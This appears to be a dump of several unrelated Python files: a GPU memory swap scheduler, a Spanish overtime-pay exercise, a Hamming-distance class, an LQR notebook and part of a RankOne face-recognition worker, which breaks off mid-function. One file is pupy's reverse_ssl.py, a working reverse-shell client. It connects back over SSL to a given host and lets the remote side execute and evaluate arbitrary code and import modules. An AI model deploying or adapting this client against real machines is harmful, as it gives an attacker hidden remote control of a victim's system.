df.append(dict(Task=f'tensor_id:{task.tensor.tensor_id}, size:{task.tensor.size}', Start=task.start_time, Finish=task.end_time, Resource='Swap In' if task.task_type == TaskType.swap_in else 'Swap Out'))
fig = ff.create_gantt(df, colors=id_color, index_col='Resource', group_tasks=True, show_colorbar=True, showgrid_x=True, showgrid_y=True, title=f'ratio={ratio}')
fig['layout']['xaxis'].update({'type': None})
fig.update_layout(
height=900,
width=1600,
)
pyplt(fig, filename=f'../../pic/job{tensor_access_list[0].tensor.job_id}.html', auto_open=True)
def try_swap_in(swap_in_task: SwapTask, swap_scheduler, access_of_target_tensor):
    # the later the swap_in the better, so sort by end time in descending order
free_intervals = get_free_intervals(swap_in_task, swap_scheduler[swap_in_task.tensor.job_id], access_of_target_tensor, 1, asc=False)
succeed = False
for interval in free_intervals:
if interval[1] - interval[0] >= swap_in_task.time_cost:
swap_in_task.end_time = interval[1]
swap_in_task.start_time = swap_in_task.end_time - swap_in_task.time_cost
swap_scheduler[swap_in_task.tensor.job_id].append(swap_in_task)
succeed = True
break
if not succeed:
return False
else:
return True
def can_next_input_access_swap_in(i, all_access_of_tensor, swap_out_task, swap_scheduler):
    # swapping in at least the first access counts as success; for later accesses that can be swapped in, set the previous access's release_flag to True
access = all_access_of_tensor[i]
swap_in_task = SwapTask(access.tensor, access.time, access.tensor.swap_time, TaskType.swap_in,
front_boundary=swap_out_task.end_time if swap_out_task.end_time > all_access_of_tensor[i - 1].end_time else all_access_of_tensor[i - 1].end_time,
back_boundary=access.time)
return try_swap_in(swap_in_task, swap_scheduler, tensor_access_by_tensor[swap_in_task.tensor.job_id][swap_in_task.tensor])
def get_framework_info(info, logged_time, job_id):
global global_tensors
tensors = {}
tensor_access_list = []
global_time = 0
parameter = []
# tensor_id: execution time of operator which generate the tensor
operator_execution_time = []
# for output_tensor_id, input_tensor_id, output_tensor_size, operation_name, is_parameter, shape, inputs_of_model in info:
for tensor_info, input_tensor_id, operation_name, operation_id, is_parameter, inputs_of_model, _ in info:
        # is_parameter: whether the generated tensor is a parameter
        # input sizes are in bytes
        # convert to MB
input_tensors = []
for tensor_id in input_tensor_id:
input_tensor = tensors[tensor_id]
input_tensors.append(input_tensor)
time_cost = get_predicted_execution_time(operation_name, inputs_of_model, logged_time[operation_id])
for output_tensor_id, output_tensor_size, shape in tensor_info:
output_tensor_size = output_tensor_size / 1000000
operator_execution_time.append(time_cost)
if operation_name in optimizer_op:
is_parameter = 1
output_tensor = Tensor(tensor_id=output_tensor_id, job_id=job_id, size=output_tensor_size, source_tensors=input_tensors, recomputation_time=time_cost, is_parameter=is_parameter, shape=shape)
output_access = TensorAccess(tensor=output_tensor, time=global_time + time_cost, run_time=time_cost, access_type=AccessType.output, operation_id=operation_id, operation_name=operation_name)
tensor_access_list.append(output_access)
tensors[output_tensor.tensor_id] = output_tensor
if is_parameter:
parameter.append(output_tensor)
for tensor_id in input_tensor_id:
input_tensor = tensors[tensor_id]
input_access = TensorAccess(tensor=input_tensor, time=global_time, run_time=time_cost, access_type=AccessType.input, operation_id=operation_id, operation_name=operation_name)
tensor_access_list.append(input_access)
global_time += time_cost
tensors = list(tensors.values())
global_tensors[job_id] = tensors
tensor_access_list = sorted(tensor_access_list, key=lambda x: x.time)
dic = defaultdict(list)
for access in tensor_access_list:
dic[access.tensor].append(access)
for k, v in dic.items():
dic[k] = sorted(v, key=lambda x: x.time)
tensor_access_by_tensor[job_id] = dic
swap_scheduler = []
    # schedule swap ins for the parameters
    # earliest_swap = None
    # earliest_time = float('inf')
    # start scheduling from the earliest parameter
parameter = sorted(parameter, key=lambda x: dic[x][0].start_time)
return tensor_access_list, swap_scheduler, parameter, operator_execution_time
# parameters used for randomly generated data
times = 150
tensors = 50
time_scale = times
ratio = 1
# global variables
job_num = 0
global_tensor_access = [[]]
tensor_access_by_tensor = []
weight = 1
jobs_weights = []
# jobs_weight = [1, 1, 1, 1, 1]
total_memory = 0
enable_recomputation = True
global_graphs = []
global_tensors = {}
swap_scheduler = []
parameters = []
models = {}
global_memory_analyzer = []
# load_all_model()
def init(logged_times: list, gpu: int):
global job_num
global global_tensor_access
global tensor_access_by_tensor
global total_memory
global handle
global jobs_weights
global global_graphs
global global_tensors
global swap_scheduler
global parameters
global global_memory_analyzer
global_tensor_access = [[]]
tensor_access_by_tensor = []
global_tensors = {}
swap_scheduler = []
parameters = []
global_memory_analyzer = []
graphs = global_graphs
jobs_weights = [weight for _ in range(len(graphs))]
tensor_access_by_tensor = [[] for _ in range(job_num)]
    # get the total amount of GPU memory currently free
if not debug_mod:
nvmlInit()
handle = nvmlDeviceGetHandleByIndex(gpu)
total_memory = nvmlDeviceGetMemoryInfo(handle).free / 1000000
else:
total_memory = 6000
job_num = len(graphs)
tmp = [get_framework_info(graphs[i], logged_times[i], i) for i in range(job_num)]
global_tensor_access = [tmp[i][0] for i in range(job_num)]
swap_scheduler = [tmp[i][1] for i in range(job_num)]
parameters = [tmp[i][2] for i in range(job_num)]
for i in range(job_num):
global_memory_analyzer.append(MemoryAnalyzer(global_tensor_access[i], global_tensors[i]))
def add_job(graph, job_id, gpu: int):
global global_graphs
assert job_id == len(global_graphs) or global_graphs[job_id] is None
if job_id == len(global_graphs):
global_graphs.append(graph)
else:
global_graphs[job_id] = graph
init([[] for _ in range(job_num)], gpu)
def remove_job(job_id, gpu: int):
global global_graphs
global_graphs[job_id] = None
init([], gpu)
def generate_scheduling_plan(logged_times, gpu: int):
    # if logged_times has already been cleared at this point, then
    # logged_times: [[(operation_id, [time, time, time])]], the outer index is job_id
global total_memory
global global_tensors
init(logged_times, gpu)
    # update the estimated times with an exponentially weighted average
tensor_nums = list(map(lambda x: len(x), tensor_access_by_tensor))
swap_out_number_limits = [int(weight * tensor_num) for weight, tensor_num in zip(jobs_weights, tensor_nums)]
swap_out_number = [0 for _ in tensor_nums]
swapped_out_tensor = set()
swapped_in_source_tensor = set()
swap_out_dict = {}
swapped_in_access = set()
recomputations = []
recomputation_tensor = set()
    # key: tensor, value: [indices in recomputations of every recomputation that releases this tensor]
    # False when the previous round produced no successful swap_out
swapped_flag = True
recomputation_flag = True
iter = 0
original_memory_used = 0
last_memory_used = 0
job_id_ordered_by_weights = list(map(lambda x: x[0], sorted([(job_id, weights) for job_id, weights in enumerate(jobs_weights)], key=lambda x: x[1], reverse=True)))
max_memory_footprint = []
# draw_all_task(tensor_access_by_tensor, swap_scheduler, job_num)
while swapped_flag or (recomputation_flag and enable_recomputation):
# MB
if not debug_mod:
total_memory = nvmlDeviceGetMemoryInfo(handle).free / 1000000
else:
total_memory = 6000
max_memory, max_tensors, last_input_accesses, max_time, time_axis = run_global_memory_analysis(swap_scheduler, swapped_out_tensor)
max_memory_footprint.append(max_memory)
        # take the first-order difference of the peak values of the last three iterations; keep iterating only if its maximum exceeds 0.05% of the latest peak or fewer than 100 iterations have run
if len(max_memory_footprint) > 3 and max([max_memory_footprint[i] - max_memory_footprint[i + 1] for i in range(len(max_memory_footprint) - 3, len(max_memory_footprint) - 1)]) < max_memory_footprint[
-1] * 0.0005 and iter > 100:
break
if iter == 0:
original_memory_used = max_memory
liveness_analysis(global_tensor_access)
else:
last_memory_used = max_memory
# print(f'iter:{iter}, max_memory:{max_memory}')
max_tensors = sorted(max_tensors, key=lambda x: x.size, reverse=True)
if swapped_flag:
swapped_flag = False
for tensor in max_tensors:
                # try to schedule a swap_out plan for this tensor
is_new_parameter = tensor.is_parameter and tensor_access_by_tensor[tensor.job_id][tensor][0].operation_name in optimizer_op and len(tensor_access_by_tensor[tensor.job_id][tensor]) == 1
if not is_new_parameter:
if swap_out_number[tensor.job_id] <= swap_out_number_limits[tensor.job_id] and len(tensor_access_by_tensor[tensor.job_id][tensor]) > 1:
                        # swapped_out means every possible swap_in has already been scheduled
if tensor not in swapped_out_tensor:
all_access_of_tensor = tensor_access_by_tensor[tensor.job_id][tensor][1:]
                            # first determine the time range for the swap_out: it cannot start before the end of the first access and cannot finish after the current moment
output_access = tensor_access_by_tensor[tensor.job_id][tensor][0]
assert output_access.access_type == AccessType.output
if last_input_accesses[tensor.job_id] is not None:
                                # the current moment
back_boundary = last_input_accesses[tensor.job_id].time
else:
last_time_access = tensor_access_by_tensor[tensor.job_id][tensor][-1]
back_boundary = last_time_access.time + tensor.swap_time
succeed = False
front_boundary = output_access.time
# failed_input_access = []
swap_out_succeed = True
have_next_ITA = True
                            # if the swap out itself could not be placed, there is no need to keep updating the feasible interval; just break
while not succeed and front_boundary < back_boundary and swap_out_succeed and have_next_ITA:
swap_out_task = SwapTask(tensor, output_access.time, tensor.swap_time, TaskType.swap_out, front_boundary=front_boundary, back_boundary=back_boundary)
free_intervals = get_free_intervals(swap_out_task, swap_scheduler[swap_out_task.tensor.job_id], tensor_access_by_tensor[tensor.job_id][tensor])
selected_first_access_index = None
                                # pick a free interval that can hold this task
swap_out_succeed = False
have_next_ITA = False
for interval in free_intervals:
if interval[1] - interval[0] >= swap_out_task.time_cost:
swap_out_succeed = True
swap_out_task.start_time = interval[0]
swap_out_task.end_time = swap_out_task.start_time + swap_out_task.time_cost
swap_scheduler[swap_out_task.tensor.job_id].append(swap_out_task)
                                        # check whether the first subsequent swap_in can be placed
for i, access in enumerate(all_access_of_tensor):
                                            # find the first access after this point
if access.start_time >= swap_out_task.end_time:
have_next_ITA = True
if can_next_input_access_swap_in(i, all_access_of_tensor, swap_out_task, swap_scheduler):
swapped_out_tensor.add(tensor)
swap_out_dict[tensor] = swap_out_task
swapped_in_access.add(access)
swap_out_number[tensor.job_id] += 1
selected_first_access_index = i
succeed = True
swapped_flag = True
else:
# failed_input_access.append(access)
swap_scheduler[swap_out_task.tensor.job_id].remove(swap_out_task)
                                                    # tighten swap_out_task's forward boundary to the end time of this failed input access
front_boundary = access.end_time
assert tensor not in swapped_out_tensor
# swapped_out_tensor.remove(tensor)
break
if not succeed:
if swap_out_task in swap_scheduler[swap_out_task.tensor.job_id]:
swap_scheduler[swap_out_task.tensor.job_id].remove(swap_out_task)
                                            # if the failure was not caused by the swap out failing to fit, regenerate the intervals
break
else:
break
                            # scheduling failed
if not succeed:
continue
if not is_new_parameter:
                                # if later accesses can be swapped in, set the previous access's release_flag to True
for i in range(selected_first_access_index + 1, len(all_access_of_tensor)):
access = all_access_of_tensor[i]
if i == 0 or access in swapped_in_access:
continue
else:
if can_next_input_access_swap_in(i, all_access_of_tensor, swap_out_task, swap_scheduler):
                                            # print(f'succeeded {access}')
swapped_in_access.add(access)
if all_access_of_tensor[i - 1].start_time > swap_out_task.end_time:
all_access_of_tensor[i - 1].release_flag = True
if swapped_flag:
break
                # if this is a new parameter, try to swap out the new parameter and swap in the corresponding old parameter
else:
if tensor not in swapped_out_tensor:
output_access = tensor_access_by_tensor[tensor.job_id][tensor][0]
assert output_access.access_type == AccessType.output
swap_out_task = SwapTask(tensor, time=output_access.time, time_cost=tensor.swap_time, task_type=TaskType.swap_out, front_boundary=output_access.end_time, back_boundary=float('inf'))
free_intervals = get_free_intervals(swap_out_task, swap_scheduler[swap_out_task.tensor.job_id], tensor_access_by_tensor[tensor.job_id][tensor])
for interval in free_intervals:
if interval[1] - interval[0] >= swap_out_task.time_cost:
swap_out_task.start_time = interval[0]
swap_out_task.end_time = swap_out_task.start_time + swap_out_task.time_cost
swap_scheduler[swap_out_task.tensor.job_id].append(swap_out_task)
                                # find the corresponding old parameter tensor
                                # since the two feasible regions are independent, just check whether the corresponding swap in can be scheduled
for t in tensor.source_tensors:
if t.is_parameter and t not in swapped_in_source_tensor:
                                        # attempt to swap it in
                                        # find the first input access (the feed_dict one is not actually used)
first_access = tensor_access_by_tensor[t.job_id][t][1]
assert first_access.access_type == AccessType.input
swap_in_task = SwapTask(t, first_access.time, first_access.tensor.swap_time, TaskType.swap_in, front_boundary=0, back_boundary=first_access.start_time)
res = try_swap_in(swap_in_task, swap_scheduler, tensor_access_by_tensor[t.job_id][t])
# assert not res, f'swap in parameter:{t} failed'
if res:
swapped_in_source_tensor.add(t)
swapped_out_tensor.add(tensor)
swap_out_dict[tensor] = swap_out_task
swapped_in_access.add(first_access)
swap_out_number[tensor.job_id] += 1
swapped_flag = True
else:
swap_scheduler[swap_out_task.tensor.job_id].remove(swap_out_task)
assert tensor not in swapped_out_tensor
break
break
elif enable_recomputation:
recomputation_flag = False
            # recomputation is needed
if max_memory >= total_memory:
for job_id in job_id_ordered_by_weights:
max_tensors_filtered = []
for tensor in max_tensors:
                        # the tensor is not a parameter, has never been evicted, and none of its source tensors have ever been swapped or recomputed
if not tensor.is_parameter and tensor not in swapped_out_tensor and tensor.source_tensors is not None and len(tensor.source_tensors) > 0 and \
False not in [t not in swapped_out_tensor for t in tensor.source_tensors] and False not in [t not in recomputations for t in tensor.source_tensors]:
max_tensors_filtered.append(tensor)
if len(max_tensors_filtered) == 0:
continue
max_tensors_by_metric = sorted(max_tensors_filtered, key=lambda x: x.recomputation_metric, reverse=True)
                    # pick the tensor with the largest metric
tensor = max_tensors_by_metric[0]
                    # find the next access after the current moment
now_time = max_time[job_id]
all_access_of_tensor = tensor_access_by_tensor[tensor.job_id][tensor]
for i, access in enumerate(all_access_of_tensor):
if access.access_type == AccessType.input and access not in recomputations:
if access.start_time >= now_time:
for source_tensor in access.tensor.source_tensors:
accesses = tensor_access_by_tensor[source_tensor.job_id][source_tensor]
for temp_acc in accesses:
                                        # make sure sources that have already been released are not recomputed
if temp_acc.release_flag and temp_acc.end_time <= access.start_time:
break
else:
recomputations.append(access)
all_access_of_tensor[i - 1].release_flag = True
recomputation_flag = True
recomputation_tensor.add(access.tensor)
break
break
iter += 1
# fig = go.Figure(data=[go.Scatter(x=list(original_memory_footprint[0].keys()), y=list(original_memory_footprint[0].values())), go.Scatter(x=list(foot_prints[0].keys()), y=list(foot_prints[0].values()))])
# plotly.offline.plot(fig, filename='../../pic/footprint.html')
# if not debug_mod:
# total_memory = nvmlDeviceGetMemoryInfo(handle).free / 1000000
# else:
# total_memory = 6000
# stats = 'succeed' if max_memory < total_memory else ' failure'
# print(f'scheduling {stats}')
# draw_all_task(tensor_access_by_tensor, swap_scheduler, job_num)
memory_saved_ratio = format((1 - last_memory_used / original_memory_used) * 100, '.2f')
print(f'memory_saved_ratio:{memory_saved_ratio}%')
print(f'swap ratio:{len(swap_scheduler[0]) / len(global_tensors)}')
# print(f'recomputations:{recomputations}')
return generate_swap_recomputation_release_order(tensor_access_by_tensor, swap_scheduler, recomputations, job_num)
def multiprocess_init(global_message_queue: multiprocessing.Queue, global_control_queue: multiprocessing.Queue, total_job_number):
# swap_order = [(20, 0, 20, 0)]
# control_messages = []
# control_message = [swap_order, [], []]
# control_messages.append(control_message)
# global_control_queue.put(control_messages)
logged_times = []
log_repeat = 0
alpha = 0.9
second_schedule_finished = False
    # todo: set up the job_id mapping from executor to algorithm
map_out_to_in = {}
map_in_to_out = {}
global job_num
job_num = 0
while True:
if not global_message_queue.empty():
global_message = global_message_queue.get()
job_id = global_message[0]
message_type = global_message[1][0]
message_graph = global_message[1][1]
if message_type == 0:
# print("job_id =", job_id)
job_num += 1
map_out_to_in[job_id] = job_num - 1
map_in_to_out[job_num - 1] = job_id
job_id_in = job_num - 1
logged_times.append([])
global_graphs.append(message_graph)
tensor_num = len(message_graph)
# with open("../../global_graphs", "wb") as f1:
# pickle.dump(global_graphs, f1)
for i in range(tensor_num):
# print(message_graph[i][6])
logged_times[job_id_in].append([message_graph[i][6]])
s = time.time()
if job_num == total_job_number:
release_order, swap_order, recomputation_order = generate_scheduling_plan(logged_times, 0)
print(f'time:{time.time() - s}')
control_messages = {}
for i in range(job_num):
# print(swap_order)
control_message = [swap_order[i], release_order[i], recomputation_order[i]]
control_messages[map_in_to_out[i]] = control_message
global_control_queue.put(control_messages)
else:
job_id_in = map_out_to_in[job_id]
total_time_old = 0
for run_time in logged_times[job_id_in]:
total_time_old += run_time[0]
total_time_new = 0
for run_time in message_graph:
total_time_new += run_time[1]
change_rate = abs(total_time_new - total_time_old) / total_time_old
print("change rate is ", change_rate)
# print("total time new is", total_time_new)
# print("total time old is", total_time_old)
if change_rate > 0.3:
is_replan = True
else:
is_replan = False
# with open("./log/total_time.txt", "a") as f1:
# print(total_time_new, file=f1)
                # todo: this ensures decisions are only made after a certain number of rounds
log_repeat += 1
if log_repeat > 0 and (is_replan or (not second_schedule_finished)):
second_schedule_finished = True
# with open("../../logged_times", "wb") as f1:
# pickle.dump(logged_times, f1)
for node_message in message_graph:
time_new = node_message[1] * alpha + logged_times[job_id_in][node_message[0]][0] * (1 - alpha)
logged_times[job_id_in][node_message[0]] = [time_new]
release_order, swap_order, recomputation_order = generate_scheduling_plan(logged_times, 0)
print(logged_times)
control_messages = {}
for i in range(job_num):
print(swap_order)
control_message = [swap_order[i], release_order[i], recomputation_order[i]]
control_messages[map_in_to_out[i]] = control_message
global_control_queue.put(control_messages)
# print(logged_times[0])
if debug_mod and __name__ == '__main__':
import pickle
with open('../../global_graphs', 'rb') as f:
g = pickle.load(f)
global_graphs = g
with open('../../logged_times', 'rb') as f:
logged_times = pickle.load(f)
job_num = 1
# profiler = LineProfiler()
# profiler.add_function(get_free_intervals)
# # profiler.add_function(get_occupied_intervals)
# # profiler.add_function(MemoryAnalyzer.get_max_memory_used)
# # profiler.add_function(run_global_memory_analysis)
# profiler_wrapper = profiler(generate_scheduling_plan)
# res = profiler_wrapper(logged_times, 0)
# profiler.print_stats()
release_order, swap_order, recomputation_order = generate_scheduling_plan(logged_times, 0)
| 45.999041 | 229 | 0.59318 | [
"MIT"
] | GIS-PuppetMaster/TENSILE | pycode/tinyflow/Scheduler.py | 49,665 | Python |
horasextra = int(input("¿Cuantas horas extra has trabajado? "))
horas = horasextra + 35 # the minimum (35 base hours)
extra = 0
sueldo = 0
class trabajo:
    def __init__(self, horasextra, horas, extra, sueldo): # define the constructor
self.horasextra = horasextra
self.horas = horas
self.extra = extra
self.sueldo = sueldo
def horas_totales(self):
if 36 < self.horas < 43:
self.extra = float(self.horas*17) * 1.25
self.sueldo = (35 * 17) + self.extra
print("Ha trabajado: ",horasextra,"horas extra y su sueldo es: ",self.sueldo, "€ ya que ha trabajado en total: ",self.horas,"horas")
if self.horas >= 44:
self.extra = float(self.horas*17) * 1.50
self.sueldo = (35*17) + self.extra
print("Ha trabajado: ",horasextra,"horas extra y su sueldo es: ",self.sueldo,"€ ya que ha trabajado en total: ",self.horas,"horas")
resultado = trabajo(horasextra, horas, extra, sueldo)
print(resultado.horas_totales()) | 43.208333 | 144 | 0.60945 | [
"Apache-2.0"
] | joseluis031/Introducci-n-a-la-algor-tmica | ej11.py | 1,042 | Python |
class Hamming:
def distance(self, gene1, gene2):
if type(gene1) != str or type(gene2) != str:
return "Genes have to be strings"
if len(gene1) != len(gene2):
return "Genes have to have same lenghts"
diff = 0
for i in range(0, len(gene1)):
if gene1[i] != gene2[i]:
diff += 1
return diff | 34.545455 | 52 | 0.513158 | [
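# Example: Hamming().distance("ACT", "AGT") -> 1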
"MIT"
] | TestowanieAutomatyczneUG/laboratorium-7-wgulan | src/sample/Hamming.py | 380 | Python |
#!/usr/bin/env python
# -*- coding: UTF8 -*-
import site
import sys
import time
import rpyc
from rpyc.core.service import Service, ModuleNamespace
from rpyc.lib.compat import execute, is_py3k
import threading
import weakref
import traceback
import os
import subprocess
import threading
import multiprocessing
import logging
import StringIO
import json
import urllib2
import urllib
import platform
import re
import ssl
import random
import imp
class ReverseSlaveService(Service):
""" Pupy reverse shell rpyc service """
__slots__=["exposed_namespace"]
def on_connect(self):
self.exposed_namespace = {}
self._conn._config.update(dict(
allow_all_attrs = True,
allow_public_attrs = True,
allow_pickle = True,
allow_getattr = True,
allow_setattr = True,
allow_delattr = True,
import_custom_exceptions = False,
propagate_SystemExit_locally=False,
propagate_KeyboardInterrupt_locally=True,
instantiate_custom_exceptions = True,
instantiate_oldstyle_exceptions = True,
))
# shortcuts
self._conn.root.set_modules(ModuleNamespace(self.exposed_getmodule))
def exposed_exit(self):
raise KeyboardInterrupt
def exposed_execute(self, text):
"""execute arbitrary code (using ``exec``)"""
execute(text, self.exposed_namespace)
def exposed_eval(self, text):
"""evaluate arbitrary code (using ``eval``)"""
return eval(text, self.exposed_namespace)
def exposed_getmodule(self, name):
"""imports an arbitrary module"""
return __import__(name, None, None, "*")
def exposed_getconn(self):
"""returns the local connection instance to the other side"""
return self._conn
def get_next_wait(attempt):
return 0.5
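    # NOTE: the unconditional return above makes the backoff logic below unreachable.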
if attempt<60:
return 0.5
else:
return random.randint(15,30)
def add_pseudo_pupy_module(HOST):
if not "pupy" in sys.modules:
mod = imp.new_module("pupy")
mod.__name__="pupy"
mod.__file__="<memimport>\\\\pupy"
mod.__package__="pupy"
sys.modules["pupy"]=mod
mod.get_connect_back_host=(lambda : HOST)
mod.pseudo=True
def main():
HOST="127.0.0.1:443"
if "windows" in platform.system().lower():
try:
import pupy
HOST=pupy.get_connect_back_host()
except ImportError:
print "Warning : ImportError: pupy builtin module not found ! please start pupy from either it's exe stub or it's reflective DLL"
else:
if len(sys.argv)!=2:
exit("usage: %s host:port"%sys.argv[0])
HOST=sys.argv[1]
add_pseudo_pupy_module(HOST)
attempt=0
while True:
try:
rhost,rport=None,None
tab=HOST.rsplit(":",1)
rhost=tab[0]
if len(tab)==2:
rport=int(tab[1])
else:
rport=443
print "connecting to %s:%s"%(rhost,rport)
conn=rpyc.ssl_connect(rhost, rport, service = ReverseSlaveService)
while True:
attempt=0
conn.serve()
except KeyboardInterrupt:
print "keyboard interrupt received !"
break
except Exception as e:
time.sleep(get_next_wait(attempt))
attempt+=1
if __name__=="__main__":
main()
| 24.375 | 132 | 0.730598 | [
"BSD-3-Clause"
] | wrtcoder/pupy | client/reverse_ssl.py | 2,925 | Python |
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import sys
print(sys.path)
sys.path.append("../lqr")
from lqr_recursion import LqrRecursion
import chainer
import numpy as np
import matplotlib.pyplot as plt
T =51
f = None
n_state =3
n_ctrl =1
n_sc = n_ctrl +n_state
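# Note: F appears to stack the dynamics as [A | B], so that x_{t+1} = F @ [x_t; u_t],
# while C and c define the quadratic cost over the stacked state-control vector
# (hence the trailing dimension n_sc in the shapes below).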
F =chainer.Variable(np.array([(np.array([[
1.0,0, 0, 1],
[1,1.0,0,0],
[0, 1, 1, 0]])) for i in range(T)])).reshape(T,1,n_state,n_sc,)
c = chainer.Variable(np.array([(np.array([0,0,0.0,0]).T) for i in range(T)])).reshape(T,1,n_sc,)
_C = np.array([np.array([[0,0 ,0,0],[0,0,0,0],[0,0,1.0,0],[0,0,0,1]]) for i in range(T-1)])
_C = np.append(_C , np.array([[0,0 ,0,0],[0,0,0,0],[0,0,1.0,0],[0,0,0,0.00000000000001]]))
C = chainer.Variable(_C).reshape(T,1,n_sc, n_sc)
x_init = chainer.Variable(np.array([0.5428, 0.7633,0.3504])).reshape(1,n_state)
C
test = LqrRecursion(x_init,C,c,F,f,T,n_state,n_ctrl)
Ks, ks = test.backward()
k1 =[]
k2 = []
fig, ax = plt.subplots()
for i in range(T-1):
k1.append(Ks[i][0][0][0].data)
k2.append(Ks[i][0][0][1].data)
major_ticks = np.arange(0,T, 2)
ax.grid(which = "major", axis = "x", color = "blue", alpha = 0.8,
linestyle = "--", linewidth = 1)
ax.grid(which = "major", axis = "y", color = "green", alpha = 0.8,
linestyle = "--", linewidth = 1)
ax.set_xticks(major_ticks)
ax.set_ylim(-0.5, 1.2)
ax.plot(k1)
ax.plot(k2)
ax.set_ylim(-2, 0)
ax.set_xlim(0,T)
x,u = test.solve_recursion()
# +
us = []
for i in range(T):
us.append(x[i][0][0].data)
fig, ax = plt.subplots()
ax.grid(which = "major", axis = "x", color = "blue", alpha = 0.8,
linestyle = "--", linewidth = 1)
# set grid lines on the y axis
ax.grid(which = "major", axis = "y", color = "green", alpha = 0.8,
linestyle = "--", linewidth = 1)
major_ticks = np.arange(0, 20, 2)
ax.set_xticks(major_ticks)
ax.set_ylim(-2, 1)
ax.set_xlim(0, 20)
ax.plot(us, marker='.')
plt.show()
# -
Ks
Ks
len(Ks)
x
| 23.298969 | 96 | 0.567257 | [
"MIT"
] | msakai/chainer-differentiable-mpc | examples/Boyd_lqr.py | 2,276 | Python |
'''
Created on August 18th 2020
@author: Nisha Srinivas
'''
import faro
import os
import faro.proto.proto_types as pt
import faro.proto.face_service_pb2 as fsd
import numpy as np
import pyvision as pv
import time
from PIL import Image
import json
import faro.proto.geometry_pb2 as geo
from array import array
roc = None
def getOptionsGroup(parser):
rankone_options = parser.add_option_group("Options for RankOne")
rankone_options.add_option("--img-quality", type=float, dest="img_quality",default=None)
rankone_options.add_option("--num-faces", type=int, dest="num_faces", default=None)
rankone_options.add_option("--min-face-size", dest="min_face_size", default='recommended')
class RankOneFaceWorker(faro.FaceWorker):
    '''
    FaRO FaceWorker implementation backed by the RankOne (ROC) SDK.
    '''
def __init__(self, options):
'''
Constructor
'''
'''
        Initialize the ROC SDK. It looks for the license file, and optionally a log file can be provided. If the license cannot be found it quits; roc_ensure catches the error and aborts.
'''
global roc
import roc as _local_roc
roc = _local_roc
if os.environ.get('ROC_LIC') is not None:
roc.roc_ensure(roc.roc_initialize(None,None))
else:
self.license_file = (roc.__file__).split('python')[0] + 'ROC.lic'
roc.roc_ensure(roc.roc_initialize(self.license_file.encode('utf-8'),None))
print("ROC SDK Initialized")
self.img_quality = options.img_quality
self.num_faces = options.num_faces
self.min_face_size = options.min_face_size
self.detection_threshold = self.recommendedDetectionThreshold()
if self.img_quality is None:
self.img_quality = self.recommendedImgQuality()
if self.num_faces is None:
self.num_faces = self.recommendedMaxFacesDetected()
'''
        ROC_Frontal : ROC frontal face detector (-30 to +30 degrees yaw)
ROC_FR : Represent in-the-wild-faces for comparison
Note : Non-frontal faces detected by ROC_FULL and ROC_PARTIAL are not reliable for recognition.
Therefore we advise against using ROC_FULL or ROC_PARTIAL in conjunction with ROC_FR or ROC_ID.
ROC_FULL : ROC face detector (-100 to +100 degrees yaw)
ROC_DEMOGRAPHICS - Return age, gender, sex
ROC_PITCHYAW - Returns yaw and pitch
'''
self.algorithm_id_detect = roc.ROC_FULL
self.algorithm_id_extract = roc.ROC_MANUAL | roc.ROC_FR | roc.ROC_DEMOGRAPHICS | roc.ROC_LANDMARKS | roc.ROC_PITCHYAW
roc.roc_ensure(roc.roc_preload(self.algorithm_id_detect))
roc.roc_ensure(roc.roc_preload(self.algorithm_id_extract))
def _converttoRocImage(self,imgarray):
#convert to PIL image (This has to be an RGB image)
image_pillow = Image.fromarray(imgarray)
        # convert PIL to roc image
image_roc = roc.roc_image()
image_roc.width = image_pillow.width
image_roc.height = image_pillow.height
image_roc.step = 3 * image_pillow.width
image_roc.color_space = roc.ROC_BGR24
bytes = 3 * image_pillow.width * image_pillow.height
image_roc.data = roc.new_uint8_t_array(bytes + 1)
roc.memmove(image_roc.data, image_pillow.tobytes())
#RankOne requires a BGR image
roc.roc_ensure(roc.roc_swap_channels(image_roc))
return image_roc
def _rocFlatten(self,tmpl):
'''
Converts roc template to serialized data.
Datatype = bytes
'''
buffer_size = roc.new_size_t()
#calculates the bytes required to a template
roc.roc_flattened_bytes(tmpl, buffer_size)
buffer_size_int = roc.size_t_value(buffer_size)
roc_buffer_src = roc.new_uint8_t_array(buffer_size_int)
roc.roc_flatten(tmpl, roc_buffer_src)
native_buffer = roc.cdata(roc_buffer_src, buffer_size_int)
roc.delete_size_t(buffer_size)
roc.delete_uint8_t_array(roc_buffer_src)
return native_buffer
def _rocUnFlatten(self, buff, template_dst):
'''
Converts serialized data back to roc template.
'''
#template_dst = roc.roc_template()
roc_buffer_dst = roc.new_uint8_t_array(len(buff) + 1)
roc.memmove(roc_buffer_dst, buff)
roc.roc_unflatten(roc_buffer_dst, template_dst)
roc.delete_uint8_t_array(roc_buffer_dst)
return template_dst
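    # Round-trip sketch for the two helpers above (illustrative only; `tmpl` would be
    # a roc_template populated by roc_represent):
    #
    #   buf = self._rocFlatten(tmpl)                      # bytes
    #   face_record.template.buffer = buf                 # stored in the protobuf
    #   restored = self._rocUnFlatten(buf, roc.roc_template())
    #
    # This is how templates move between detect(), extract() and score() below.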
def _detect(self,im, opts):
        '''
        In RankOne, face detection happens inside the roc_represent function;
        there is no explicit face detection step as in dlib. We still report the
        bounding box for each detection.
        roc_represent requires the image to be a roc_image. The input here is a
        numpy array (e.g. from skimage imread), so it is converted to a PIL image
        and then to a roc_image, following the conversion example that RankOne
        provides.
        '''
h,w,_ = im.shape
if isinstance(im,np.ndarray):
im = self._converttoRocImage(im)
        '''
        min_face_size indicates the smallest face to detect. Face detection size
        is measured by the width of the face in pixels; the default value of 36
        roughly corresponds to 18 pixels between the eyes.
        '''
if self.min_face_size == 'recommended':
self.min_face_size = self.recommendedMinFaceSize()
elif self.min_face_size == 'adaptive_size':
'''
A method for determining the minimum face detection size as a fraction of the image size.
In the interest of efficiency, it is recommended to set a lower bound on the minimum face detection size as a fraction of the image size. Given a relative minimum size of 4% of the image dimensions, and an absolute minimum size of 36 pixels, the adaptive minimum size is: max(max(image.width, image.height) * 0.04, 36).
Example
roc_image image = ...;
size_t adaptive_minimum_size;
roc_adaptive_minimum_size(image, 0.04, 36, &adaptive_minimum_size);
'''
            adaptive_minimum_size = roc.new_size_t()
            roc.roc_ensure(roc.roc_adaptive_minimum_size(im, 0.04, 36, adaptive_minimum_size))
else:
self.min_face_size = int(self.min_face_size)
self.detection_threshold = opts.threshold
if opts.best:
self.num_faces = 1
#create a template array
templates = roc.new_roc_template_array(self.num_faces)
